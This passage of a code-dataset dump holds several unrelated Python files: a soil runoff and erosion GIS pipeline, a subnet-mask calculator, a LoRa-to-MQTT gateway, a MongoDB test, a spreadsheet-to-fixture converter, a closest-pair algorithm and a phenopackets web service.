\r\n print(\"Calculating runoff volume (liters)...\")\r\n # 2.54 converts inches to cm\r\n # 0.001 converts cubic cm to liters\r\n volumeConversion = 0.00254*cellArea\r\n runoffVolume = volumeConversion*runoffDepth\r\n print(\"Saving...\")\r\n runoffVolume.save(out_runoffVolume)\r\n \r\n # if in_FlowDir != \"NONE\":\r\n # print(\"Calculating runoff accumulation...\")\r\n # accumRunoff = FlowAccumulation(in_FlowDir, runoff, \"FLOAT\", \"D8\") + runoff\r\n # print(\"Saving...\")\r\n # accumRunoff.save(out_accumRunoff)\r\n # else:\r\n # print(\"No flow direction raster provided; runoff not accumulated.\")\r\n \r\n print(\"Mission accomplished.\")\r\n \r\ndef main():\r\n # Inputs - Soils\r\n dc_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_DC\\gSSURGO_DC.gdb\"\r\n de_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_DE\\gSSURGO_DE.gdb\"\r\n ky_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_KY\\gSSURGO_KY.gdb\"\r\n md_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_MD\\gSSURGO_MD.gdb\"\r\n nc_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_NC\\gSSURGO_NC.gdb\"\r\n pa_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_PA\\gSSURGO_PA.gdb\"\r\n tn_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_TN\\gSSURGO_TN.gdb\"\r\n va_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_VA\\gSSURGO_VA.gdb\"\r\n wv_gdb = r\"E:\\SpatialData\\SSURGO\\gSSURGO_WV\\gSSURGO_WV.gdb\"\r\n \r\n # Inputs - Miscellany\r\n in_Snap = r\"E:\\SpatialData\\HealthyWatersWork\\HW_templateRaster_Feature\\HW_templateRaster.tif\"\r\n in_Elev = r\"E:\\SpatialData\\elev_cm.gdb\\elev_cm.gdb\\elev_cm_VA\"\r\n in_clpShp = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200601.gdb\\HW_template_buff13k_noHoles\"\r\n in_Rfactor = r\"F:\\CurrentData\\R_Factor\\R-Factor_CONUS.tif\"\r\n in_pmpPts = r\"E:\\SpatialData\\DCR_DamSafety\\PMP\\pmpEvalTool_v2\\Output\\General\\PMP_64457.gdb\\General_PMP_Points_64457\"\r\n pmpFld = \"PMP_24\"\r\n \r\n # Outputs\r\n outGDB = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200710.gdb\" # I change this frequently \r\n out_Runoff = outGDB + os.sep + \"runoffScore\"\r\n out_Erosion = outGDB + os.sep + \"erosionScore\"\r\n out_SoilSens = outGDB + os.sep + \"soilSens\" \r\n hydroGrp = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200527.gdb\\hydroGroup\"\r\n slope_perc = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200626.gdb\\slope_perc\"\r\n Kfactor = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200527.gdb\\rusleK\"\r\n Sfactor = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200626.gdb\\rusleS\"\r\n Rfactor = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200601.gdb\\rusleR\"\r\n rusleRKS = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200626.gdb\\rusleRKS\"\r\n maxPrecip250 = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200629.gdb\\maxPrecip_gen24_topo250\"\r\n maxPrecip10 = r\"E:\\SpatialData\\HealthyWatersWork\\hwProducts_20200629.gdb\\maxPrecip_gen24_topo10\"\r\n in_Rain = maxPrecip10\r\n \r\n # Year-specific Outputs/Inputs\r\n # RUSLE C-Factor\r\n rusleC_2016 = outGDB + os.sep + \"rusleC_2016\"\r\n rusleC_2011 = outGDB + os.sep + \"rusleC_2011\"\r\n rusleC_2006 = outGDB + os.sep + \"rusleC_2006\"\r\n rusleC_2001 = outGDB + os.sep + \"rusleC_2001\" \r\n \r\n # RUSLE RKSC\r\n rusleRKSC_2016 = outGDB + os.sep + \"rusleRKSC_2016\"\r\n rusleRKSC_2011 = outGDB + os.sep + \"rusleRKSC_2011\"\r\n rusleRKSC_2006 = outGDB + os.sep + \"rusleRKSC_2006\"\r\n rusleRKSC_2001 = outGDB + os.sep + \"rusleRKSC_2001\"\r\n rusleRKSC_dfor = outGDB + os.sep + \"rusleRKSC_dfor\"\r\n rusleRKSC_bare = outGDB + os.sep + \"rusleRKSC_bare\"\r\n \r\n # Curve Numbers\r\n curvNum_2016 = outGDB + os.sep + \"curvNum_2016\"\r\n curvNum_2011 = outGDB + os.sep + \"curvNum_2011\"\r\n curvNum_2006 = outGDB + os.sep + \"curvNum_2006\"\r\n curvNum_2001 = outGDB + os.sep + \"curvNum_2001\"\r\n curvNum_dfor = outGDB + os.sep + \"curvNum_dfor\"\r\n curvNum_bare = outGDB + os.sep + \"curvNum_bare\"\r\n \r\n # Runoff Volume\r\n runoffVol_2016 = outGDB + os.sep + \"runoffVol_2016\"\r\n runoffVol_2011 = outGDB + os.sep + \"runoffVol_2011\"\r\n runoffVol_2006 = outGDB + os.sep + \"runoffVol_2006\"\r\n runoffVol_2001 = outGDB + os.sep + \"runoffVol_2001\"\r\n \r\n # Pollutant Coefficients\r\n Nitrogen_2016 = outGDB + os.sep + \"Nitrogen_2016\"\r\n Nitrogen_2011 = outGDB + os.sep + \"Nitrogen_2011\"\r\n Nitrogen_2006 = outGDB + os.sep + \"Nitrogen_2006\"\r\n Nitrogen_2001 = outGDB + os.sep + \"Nitrogen_2001\"\r\n Phosphorus_2016 = outGDB + os.sep + \"Phosphorus_2016\"\r\n Phosphorus_2011 = outGDB + os.sep + \"Phosphorus_2011\"\r\n Phosphorus_2006 = outGDB + os.sep + \"Phosphorus_2006\"\r\n Phosphorus_2001 = outGDB + os.sep + \"Phosphorus_2001\"\r\n SuspSolids_2016 = outGDB + os.sep + \"SuspSolids_2016\"\r\n SuspSolids_2011 = outGDB + os.sep + \"SuspSolids_2011\"\r\n SuspSolids_2006 = outGDB + os.sep + \"SuspSolids_2006\"\r\n SuspSolids_2001 = outGDB + os.sep + \"SuspSolids_2001\"\r\n \r\n # Processing Lists/Dictionaries\r\n gdbList = [dc_gdb, de_gdb, ky_gdb, md_gdb, nc_gdb, pa_gdb, tn_gdb, va_gdb, wv_gdb]\r\n testList = [dc_gdb]\r\n \r\n nlcdDict = dict()\r\n nlcdDict[2016] = r\"E:\\SpatialData\\NLCD_landCover.gdb\\nlcd_ccap_2016_10m\"\r\n nlcdDict[2011] = r\"E:\\SpatialData\\NLCD_landCover.gdb\\nlcd_ccap_2011_10m\"\r\n nlcdDict[2006] = r\"E:\\SpatialData\\NLCD_landCover.gdb\\nlcd_ccap_2006_10m\"\r\n nlcdDict[2001] = r\"E:\\SpatialData\\NLCD_landCover.gdb\\nlcd_ccap_2001_10m\"\r\n \r\n ### Specify function(s) to run\r\n createFGDB(outGDB) # Create the specified outGDB if it doesn't already exist\r\n \r\n ### Create NSPECT pollution coefficient rasters\r\n print(\"Creating year-specific NSPECT pollution coefficient rasters...\")\r\n nDict = dict()\r\n pDict = dict()\r\n sDict = dict()\r\n coeffList = [[\"Nitrogen\", \"NPOLL\", nDict], \r\n [\"Phosphorus\", \"PPOLL\", pDict], \r\n [\"SuspSolids\", \"SPOLL\", sDict]]\r\n for year in nlcdDict.keys():\r\n print(\"Working on %s data...\" %year)\r\n for coeff in coeffList:\r\n rName = coeff[0]\r\n coeffType = coeff[1]\r\n coeffDict = coeff[2]\r\n out_Coeff = outGDB + os.sep + \"%s_%s\" %(rName, year)\r\n coeffNSPECT(nlcdDict[year], coeffType, out_Coeff)\r\n coeffDict[year] = out_Coeff\r\n \r\n ### Create curve number rasters\r\n SSURGOtoRaster(gdbList, \"HydroGrpNum\", in_Snap, hydroGrp)\r\n print(\"Creating year-specific Curve Number rasters...\")\r\n cnDict = dict()\r\n for year in nlcdDict.keys():\r\n print(\"Working on %s data...\" %year)\r\n in_LC = nlcdDict[year]\r\n out_CN = outGDB + os.sep + \"curvNum_%s\" %year\r\n curvNum(in_LC, hydroGrp, out_CN)\r\n cnDict[year] = out_CN\r\n \r\n ### Create RUSLE factors\r\n print(\"Creating year-specific C-factors...\")\r\n cfactDict = dict()\r\n for year in nlcdDict.keys():\r\n print(\"Working on %s data...\" %year)\r\n in_LC = nlcdDict[year]\r\n out_Cfactor = outGDB + os.sep + \"rusleC_%s\" %year\r\n coeffNSPECT(in_LC, \"CFACT\", out_Cfactor)\r\n cfactDict[year] = out_Cfactor\r\n print(\"Downscaling R-factor...\")\r\n Downscale_ras(in_Rfactor, in_Snap, Rfactor, \"BILINEAR\", in_clpShp) # R-factor\r\n print(\"Creating K-factor raster...\")\r\n SSURGOtoRaster(gdbList, \"kFactor\", in_Snap, Kfactor) # K-factor\r\n print(\"Creating S-factor raster...\")\r\n SlopeTrans(in_Elev, \"ELEV\", \"RUSLE\", Sfactor, slope_perc, zfactor = 0.01) # S-factor\r\n print(\"Creating RKS raster...\")\r\n soilLoss_RKS(Rfactor, Kfactor, Sfactor, rusleRKS) # R*K*S\r\n \r\n ### Get Probable Maximum Precipitation\r\n # First had to use the PMP tool(https://www.dcr.virginia.gov/dam-safety-and-floodplains/pmp-tool) from within ArcGIS Pro to generate the points used for interpolation. I specified a 24-hour storm duration, and used the \"General\" output.\r\n # arcpy.ImportToolbox(r'E:\\SpatialData\\DCR_DamSafety\\PMP\\pmpEvalTool_v2\\Script\\VA_PMP_Tools_v2.tbx','')\r\n # arcpy..PMPCalc(r\"E:\\SpatialData\\HW_templateRaster_Feature\\HW_templateFeature.shp\", r\"E:\\SpatialData\\DCR_DamSafety\\PMP\\pmpEvalTool_v2\", r\"E:\\SpatialData\\DCR_DamSafety\\PMP\\pmpEvalTool_v2\\Output\", \"24\", \"24\", \"24\", True, None)\r\n interpPoints(in_pmpPts, pmpFld, in_Snap, maxPrecip250, in_clpShp, \"TOPO\", \"\", \"\", 250)\r\n Downscale_ras(maxPrecip250, in_Snap, maxPrecip10, \"BILINEAR\", in_clpShp)\r\n \r\n ### Create runoff, pollution, and sediment yield rasters\r\n print(\"Creating year-specific runoff, pollution, and sediment yield rasters...\")\r\n runoffDict = dict()\r\n nMassDict = dict()\r\n pMassDict = dict()\r\n sMassDict = dict()\r\n pollutantList = [[\"Nitrogen\", nDict, nMassDict], \r\n [\"Phosphorus\", pDict, pMassDict], \r\n [\"SuspSolids\", sDict, sMassDict ]]\r\n for year in nlcdDict.keys():\r\n print(\"Working on %s data...\" %year)\r\n CN = cnDict[year]\r\n cFact = cfactDict[year]\r\n print(\"Calculating runoff...\")\r\n eventRunoff(CN, in_Rain, outGDB, year, 1000000, \"CN\")\r\n runoffDict[year] = outGDB + os.sep + \"runoffVol_%s\" %year\r\n for pollutant in pollutantList:\r\n rName = pollutant[0]\r\n coeffDict = pollutant[1]\r\n massDict = pollutant[2]\r\n out_Raster = outGDB + os.sep + \"LocMass_%s_%s\"%(rName, year)\r\n print(\"Calculating %s mass...\"%rName)\r\n pollMass = Raster(coeffDict[year])*Raster(runoffDict[year])\r\n pollMass.save(out_Raster)\r\n massDict[year] = out_Raster\r\n print(\"Calculating standard sediment yield...\")\r\n SedYld(rusleRKS, CN, year, slope_perc, outGDB, cFact, sdrType = \"STD\", cellArea = 0.0001)\r\n print(\"Calculating alternate sediment yield...\")\r\n SedYld(rusleRKS, CN, year, slope_perc, outGDB, cFact, sdrType = \"ALT\")\r\n \r\n ### Get \"worst-case\" (bare land, NLCD code 31, C-factor = 0.700) and \"best-case\" (deciduous forest, NLCD code 41, C-factor = 0.009) scenarios for curve numbers, runoff, and sedimentation. These are not necessarily the best or worst (e.g., wetlands are even better than deciduous forest) but serve the purpose here.\r\n print(\"Calculating best- and worst-case curve numbers...\")\r\n curvNum(41, hydroGrp, curvNum_dfor)\r\n curvNum(31, hydroGrp, curvNum_bare)\r\n # Event runoff\r\n print(\"Calculating best-and worst-case runoff...\")\r\n eventRunoff(curvNum_dfor, in_Rain, outGDB, \"dfor\")\r\n eventRunoff(curvNum_bare, in_Rain, outGDB, \"bare\")\r\n # Soil loss potential\r\n print(\"Calculating best- and worst-case soil loss potential...\")\r\n soilLoss_RKSC(rusleRKS, 0.009, rusleRKSC_dfor)\r\n soilLoss_RKSC(rusleRKS, 0.700, rusleRKSC_bare)\r\n print(\"Mission accomplished.\")\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"procSSURGO.py","file_name":"procSSURGO.py","file_ext":"py","file_size_in_byte":47976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"277651706","text":"import ipaddress\r\nimport math\r\nimport os\r\nimport subprocess\r\n\r\n#default subnetmask\r\nsubnet_mask={'A':'255.0.0.0','B':'255.255.0.0','C':'255.255.255.0','D':'255.255.255.255'}\r\n\r\n#identifies class of ip addr(classful)\r\n\r\ndef findClass(ip_addr,n):\r\n\toctet=ip_addr.split('.')\r\n\tnew_mask=\"\"\r\n\tnet_id=\"\"\r\n\tif int(octet[0]) in range(0,128) and n<=24:\r\n\t\tprint('Class A')\r\n\t\tprint(\"Old Subnet==\"+subnet_mask['A'])\r\n\t\tl1=subnet_mask['A'].split('.')\r\n\t\ttemp=0\r\n\t\tfor i in range(0,n):\t\r\n \t\ttemp=temp+2**(7-i)\r\n\t\t\t\r\n\t\t\r\n\t\tl1[1]=str(temp)\r\n\t\tnew_mask=\".\".join(l1)\r\n\t\tprint(\"New subnet==\"+ new_mask)\r\n\t\tnet_id=octet[0]+'.0.0.0'\r\n\t\r\n\r\n\telif int(octet[0]) in range(128,192) and n<=16:\r\n\t\tprint('Class B')\r\n\t\tprint(\"Old Subnet==\"+subnet_mask['B'])\r\n\t\tl1=subnet_mask['B'].split('.')\r\n\t\ttemp=0\r\n\t\tfor i in range(0,n):\t\r\n \t\ttemp=temp+2**(7-i)\r\n\t\t\t\r\n\t\t\r\n\t\tl1[2]=str(temp)\r\n\t\tnew_mask=\".\".join(l1)\r\n\t\tprint(\"New subnet==\"+new_mask)\r\n\t\tnet_id=octet[0]+\".\"+octet[1]+'.0.0'\t\r\n\t\t\r\n\telif int(octet[0]) in range(192,224) and n<=8:\r\n\t\tprint('Class C')\r\n\t\tprint(\"Old Subnet==\"+subnet_mask['C'])\r\n\t\tl1=subnet_mask['C'].split('.')\r\n\r\n\t\ttemp=0\r\n\t\tfor i in range(0,n):\t\r\n \t\ttemp=temp+2**(7-i)\r\n\t\t\t\r\n\t\t\r\n\t\tl1[3]=str(temp)\r\n\t\tnew_mask=\".\".join(l1)\r\n\t\tprint(\"New subnet==\"+new_mask)\r\n\t\tnet_id=octet[0]+\".\"+octet[1]+\".\"+octet[2]+'.0'\r\n\treturn new_mask,net_id\t\r\n\t\r\n\t\r\ndef subnet_mask_classless(length):\r\n\tmask=[]\r\n\tif length <8 :\r\n\t\t\r\n\t\ttemp=0\r\n\t\tfor i in range(0,length):\t\r\n\t\t\ttemp=temp+2**(7-i)\r\n\t\t\tmask.append(str(temp))\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\t\r\n\tif length>=8 and length<16:\r\n\t\tmask.append('255')\r\n\t\tif(length>8):\r\n\t\t\tlength-=8\r\n\t\t\ttemp=0\r\n\t\t\tfor i in range(0,length):\t\r\n\t\t\t\ttemp=temp+2**(7-i)\r\n\t\t\t\r\n\t\t\tmask.append(str(temp))\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\telse:\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\t\t\t\r\n\t\t\r\n\t\t\t\r\n\telif length>=16 and length<24:\r\n\t\tmask.append('255')\r\n\t\tmask.append('255')\r\n\t\tif(length>16):\r\n\t\t\tlength-=16\r\n\t\t\ttemp=0\r\n\t\t\tfor i in range(0,length):\t\r\n\t\t\t\ttemp=temp+2**(7-i)\r\n\t\t\tmask.append(str(temp))\r\n\t\t\tmask.append('0')\r\n\t\telse:\r\n\t\t\tmask.append('0')\r\n\t\t\tmask.append('0')\r\n\r\n\telif length>=24 and length<32:\r\n\t\tmask.append('255')\r\n\t\tmask.append('255')\r\n\t\tmask.append('255')\r\n\t\tif(length>24):\r\n\t\t\tlength-=24\r\n\t\t\ttemp=0\r\n\t\t\tfor i in range(0,length):\t\r\n\t\t\t\ttemp=temp+2**(7-i)\r\n\t\t\tmask.append(str(temp))\r\n \t\r\n\treturn \".\".join(mask)\r\n\t\t\r\n\r\n\t\t\r\n\t\r\n\t\r\n\r\n\t\r\n#creates subnets\t\r\n\r\ndef subNet(ip_addr,subnets_gr,no_of_subnets):\r\n\tfor i, subnet in enumerate(subnets_gr):\r\n\t\tif(i payload topic dan payload data\n print (payload[\"topic\"])\n print (payload[\"data\"])\n print()\n #bikin json dari array payload data \n payload2 = json.dumps(payload[\"data\"])\n #publish ke broker\n test.publish(payload[\"topic\"], payload2)\n \n except Exception as e:\n print(e)\n\ndef main():\n\n try:\n #GPIO.setwarnings(False)\n controller = config_lora.Controller()\n\n lora = controller.add_transceiver(sx127x.SX127x(name = 'LoRa'),\n pin_id_ss = config_lora.Controller.PIN_ID_FOR_LORA_SS,\n pin_id_RxDone = config_lora.Controller.PIN_ID_FOR_LORA_DIO0)\n print('lora', lora)\n\n #LoRaReceiver.receive(lora)\n print(\"LoRa Receiver\")\n while True: \n if lora.receivedPacket():\n t = threading.Thread(target=fwdToMQTT(lora))\n #threads.append(t)\n t.start()\n #print (threads)\n \n except KeyboardInterrupt:\n print (\"Program dihentikan dengan interupsi\")\n GPIO.cleanup()\n except Exception as e :\n print (\"terjadi kesalahan\")\n print (e)\n #finally:\n #GPIO.cleanup()\n\nif __name__ == '__main__':\n main()","sub_path":"gatewayToBroker.py","file_name":"gatewayToBroker.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"397992916","text":"# coding=utf-8\n\"\"\"\nmongodb and useful function tools unittest\n :copyright: (c) 2015 by fangpeng.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n__date__ = '1/23/16'\nimport unittest\nimport motor\n\nfrom Tenglish.db import mongo_obj, mongodb\nfrom Tenglish.tests.testutils.mongo_unit import MongoUnitTest\n\n\nclass MongoDBTestCase(MongoUnitTest):\n def test_db(self):\n self.assertIsInstance(mongodb, motor.MotorDatabase)\n\n def test_auth_db(self):\n self.assertIsInstance(mongodb.auth_db, motor.MotorCollection)\n\n def test_mongo_obj(self):\n schema = {\n 'name': (str, True),\n 'id': (int, True)\n }\n\n @mongo_obj(schema)\n def get_obj(data):\n return data\n\n self.assertIn('id', get_obj({'name': 'BeginMan', 'id': 1001}))\n self.assertIn('name', get_obj({'name': 'BeginMan'}))\n self.assertIn('name', get_obj({'name': u'BeginMan'}))\n self.assertIn('name', get_obj({}))\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Tenglish/tests/db/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"95517687","text":"import os\nimport json\nimport urllib.request\nimport openpyxl\nfrom slugify import slugify\nfrom pprint import pprint\n\n\ndef save_images(data):\n\topener=urllib.request.build_opener()\n\topener.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n\turllib.request.install_opener(opener)\n\tfull_file_path = os.path.join(\"/Users/Jr/desktop/development-folder/marketplace/src/fixtures/images\", \"{0}.jpg\".format(data[\"slug\"]))\n\treturn urllib.request.urlretrieve(data[\"photo_link\"], full_file_path)\n\n\n\ndef create_fixture_file(data, file_name):\n\twith open(file_name, \"w\") as f:\n\t\tjson.dump(data, f, indent=4)\n\n\ndef generate_template(data):\n\tfixture_data = {\n\t\t\"pk\": data['pk'],\n\t\t\"fields\": {\n\t\t \"warning\": \"dfknakdf\",\n\t\t \"added_date\": \"2016-12-04T23:37:04Z\",\n\t\t \"weight\": data['weight'],\n\t\t \"brand\": data['brand'],\n\t\t \"active\": True,\n\t\t \"description\": data['desc'],\n\t\t \"categories\": data['category'],\n\t\t \"default\": None,\n\t\t \"sales_price\": None,\n\t\t \"price\": \"12.99\",\n\t\t \"title\": data['name'],\n\t\t \"featured\": False,\n\t\t \"slug\": data[\"slug\"]\n\t\t },\n\t\t\"model\": \"products.product\"\n\t}\n\n\treturn fixture_data\n\n\ndef get_excel_data(workbook):\n\tvalid_data = {}\n\tdup_data = {}\n\tdata_list = []\n\tphoto_data = []\n\tpk_counter = 0\n\n\twb = openpyxl.load_workbook(workbook)\n\tsheet = wb.get_sheet_by_name('Supplements')\n\n\tfor row in range(3, sheet.max_row + 1):\n\t\tpk_counter += 1\n\t\ttry:\n\t\t\tname = sheet['A' + str(row)].value.title()\n\t\t\tbrand = sheet['B' + str(row)].value.title()\n\t\t\tweight = sheet['C' + str(row)].value\n\t\t\tcategory = [int(x) for x in sheet['E' + str(row)].value.strip(\" \").split(\",\") if x]\n\t\t\tdesc = sheet['F' + str(row)].value\n\t\t\tphoto_link = sheet['G' + str(row)].value\n\n\t\t\tif name not in valid_data:\n\t\t\t\tvalid_data[name] = {\n\t\t\t\t\t\"name\": name,\n\t\t\t\t\t\"brand\": brand,\n\t\t\t\t\t\"weight\": weight,\n\t\t\t\t\t\"desc\": desc,\n\t\t\t\t\t\"category\": category,\n\t\t\t\t\t\"pk\": pk_counter,\n\t\t\t\t\t\"photo_link\": photo_link,\n\t\t\t\t\t\"slug\": slugify(name)\n\t\t\t\t}\n\t\t\t\tphoto_data.append(valid_data[name])\n\t\t\t\t# save_images(valid_data[name])\n\t\t\t\tdata_list.append(generate_template(valid_data[name]))\n\t\t\telse:\n\t\t\t\tdup_data[name] = {\n\t\t\t\t\t\"name\": name,\n\t\t\t\t\t\"brand\": brand,\n\t\t\t\t\t\"weight\": weight,\n\t\t\t\t\t\"desc\": desc,\n\t\t\t\t\t\"pk\": pk_counter,\n\t\t\t\t\t\"photo_link\": photo_link,\n\t\t\t\t\t\"slug\": slugify(name)\n\t\t\t\t}\n\t\texcept Exception as e:\n\t\t\tprint(e, row, name)\n\t\t\tpass\n\treturn (data_list, dup_data, photo_data)\n\ndef create_product_image_file():\n\twith open('photo-data.json') as data_file: \n\t\tdata = json.load(data_file)\n\t\tjson_list = []\n\t\tfor i in data:\n\t\t\ti[\"abs_path\"] = os.path.join(\"/Users/Jr/desktop/development-folder/marketplace/src/fixtures/images\", \"{0}.jpg\".format(i[\"slug\"]))\n\t\t\tjson_list.append(i)\n\n\twith open('photo-data.json', 'w') as f:\n\t json.dump(json_list, f)\n\n\n# get_excel_data('product-list.xlsx')\ncreate_fixture_file(get_excel_data('product-list.xlsx')[0], \"inital-data.json\")\ncreate_fixture_file(get_excel_data('product-list.xlsx')[1], \"duplicate-data.json\")\ncreate_fixture_file(get_excel_data('product-list.xlsx')[2], \"photo-data.json\")\ncreate_product_image_file()\n\n\n","sub_path":"fixtures/get_excel_data.py","file_name":"get_excel_data.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"57755014","text":"#!/usr/bin/python\n\n# James Hollister \n# Finds the closest pair using brute force and divide and conquer\n\nimport math\nimport sys\n\nclass Point:\n def __init__(self, x=0, y=0):\n self.x = x\n self.y = y\n\ndef distance(P1, P2):\n return math.sqrt((P1.x - P2.x)**2 + (P1.y - P2.y)**2)\n\ndef nearest_neighbor_brute(A):\n \"\"\"Takes a list of Points and returns the closest pair\"\"\"\n if (len(A) < 2):\n return 0\n minimum = distance(A[0], A[len(A)-1])\n for i in range(len(A)-1):\n for j in range(i+1, len(A)):\n dist = distance(A[i], A[j])\n if (dist < minimum):\n minimum = dist\n return minimum\n\ndef nearest_neighbor_div(A):\n \"\"\"Takes a list of Points and returns the closest pair\"\"\"\n return _nearest_neighbor_div(sorted(A, key=lambda point: point.x), \\\n sorted(A, key=lambda point: point.y))\n \ndef _nearest_neighbor_div(X, Y):\n \"\"\"Takes two list of Points containing the same values,\n sorted by x and y, respectively, and returns the closest pair\"\"\"\n length = len(X)\n if length <= 3:\n return nearest_neighbor_brute(X)\n mid = int(length / 2)\n midPoint = X[mid]\n Yleft = []\n Yright = []\n for i in Y:\n if i.x <= midPoint.x: \n Yleft.append(i)\n else:\n Yright.append(i)\n \n minLeft = _nearest_neighbor_div(X[:mid], Yleft)\n minRight = _nearest_neighbor_div(X[mid:], Yright)\n d = min(minLeft, minRight)\n\n middle = []\n for point in Y:\n if point.x > (midPoint.x - d) and point.x < (midPoint.x + d):\n middle.append(point)\n if len(middle) > 1:\n # traverse through list of middle points\n # only need to look at max 7 points in front of every point\n for i in range(len(middle) - 1):\n for j in range(i+1, min(i+8, len(middle))):\n dist = distance(middle[i], middle[j])\n if dist < d:\n d = dist\n return d\n\n\ndef main():\n if (len(sys.argv) < 2):\n print (\"Enter a file as a command line argument\")\n sys.exit(1)\n for arg in sys.argv[1:]:\n A = []\n test_file = open(arg)\n print(arg + \":\")\n for line in test_file:\n point = line.strip().split(\" \")\n A.append(Point(float(point[0]), float(point[1])))\n closest = nearest_neighbor_div(A)\n print(closest)\n file_name = arg[:arg.find(\".\")] + \"_distance.txt\"\n answer_file = open(file_name, \"w\")\n answer_file.write(str(closest) + \"\\n\")\n answer_file.close()\n test_file.close()\n\n\nmain()\n\n\n","sub_path":"p1/nearest_neighbor.py","file_name":"nearest_neighbor.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"282336414","text":"#!/usr/local/bin/python3\n\nimport cgi, cgitb\nimport json, yaml\nfrom os import environ, path, pardir\nimport sys, datetime, argparse\n\n# local\ndir_path = path.dirname( path.abspath(__file__) )\npkg_path = path.join( dir_path, pardir )\nsys.path.append( pkg_path )\nfrom beaconServer.lib import *\nfrom beaconServer.lib.service_utils import *\n\n\"\"\"podmd\n\npodmd\"\"\"\n\n################################################################################\n################################################################################\n################################################################################\n\ndef main():\n\n phenopackets()\n \n################################################################################\n\ndef phenopackets():\n\n byc = initialize_service()\n\n for p_k, p_v in byc[\"these_prefs\"][\"parameters\"].items():\n # TODO: parameter checks ...\n if p_k in byc[\"form_data\"]:\n byc.update( { p_k: byc[\"form_data\"][p_k] } )\n\n select_dataset_ids(byc)\n check_dataset_ids(byc)\n get_filter_flags(byc)\n parse_filters(byc)\n\n parse_variants(byc)\n get_variant_request_type(byc)\n generate_queries(byc)\n\n create_empty_service_response(byc) \n response_collect_errors(byc)\n cgi_break_on_errors(byc)\n\n ds_id = byc[ \"dataset_ids\" ][ 0 ]\n response_add_parameter(byc, \"dataset\", ds_id )\n \n execute_bycon_queries( ds_id, byc )\n query_results_save_handovers(byc)\n\n access_id = byc[\"query_results\"][\"biosamples._id\"][ \"id\" ]\n\n h_o, e = retrieve_handover( access_id, **byc )\n h_o_d, e = handover_return_data( h_o, e )\n if e:\n response_add_error(byc, 422, e )\n\n access_id_ind = byc[\"query_results\"][\"individuals._id\"][ \"id\" ]\n ind_s = [ ]\n h_o_ind, e_ind = retrieve_handover( access_id_ind, **byc )\n h_o_d_ind, e_ind = handover_return_data( h_o_ind, e_ind )\n\n var_data = [ ]\n access_id_var = [ ]\n\n if \"variantsaccessid\" in byc[\"form_data\"]:\n access_id_var = byc[\"form_data\"][\"variantsaccessid\"]\n elif \"variants._id\" in byc[\"query_results\"]:\n access_id_var = byc[\"query_results\"][\"variants._id\"][\"id\"]\n if len(access_id_var) > 1:\n h_o_var, e_var = retrieve_handover( access_id_var, **byc )\n var_data, e_var = handover_return_data( h_o_var, e_var )\n\n results = [ ]\n\n for i_s in h_o_d_ind:\n\n pxf = {\n \"id\": \"pxf__\"+i_s[\"id\"],\n \"subject\": i_s[\"id\"],\n \"biosamples\": [ ]\n }\n\n # TODO: method here retrieves & reformats the biosamples\n pxf_bs = list(filter(lambda d: d[\"individual_id\"] == i_s[\"id\"], h_o_d))\n for bs in pxf_bs:\n p_bs = {\n \"id\": bs[\"id\"],\n \"externalReferences\": [ ],\n }\n if \"histological_diagnosis\" in bs:\n p_bs.update( { \"histologicalDiagnosis\": bs[\"histological_diagnosis\"]})\n if \"sampledTissue\" in bs:\n p_bs.update( { \"sampledTissue\": bs[\"sampledTissue\"]})\n if \"external_references\" in bs:\n p_bs.update( { \"externalReferences\": bs[\"external_references\"]})\n\n # TODO: The `digest` here is just a minimal drop-in representation.\n # HGVS cannot be used since it doesn't allow DUP ...\n if len(var_data) > 0:\n bs_vars = list(filter( lambda x : x['biosample_id'] == bs[\"id\"], var_data ) )\n if \"progenetix\" in byc[\"variant_format\"]:\n p_bs.update( { \"variants\": bs_vars } )\n else:\n p_bs.update( { \"variants\": [ ] } )\n for v in bs_vars:\n if \"digest\" in byc[\"variant_format\"]:\n p_bs[\"variants\"].append( v[\"digest\"] )\n\n pxf[\"biosamples\"].append( p_bs )\n\n results.append( pxf )\n\n populate_service_response( byc, results)\n cgi_print_response( byc, 200 )\n\n################################################################################\n################################################################################\n\nif __name__ == '__main__':\n 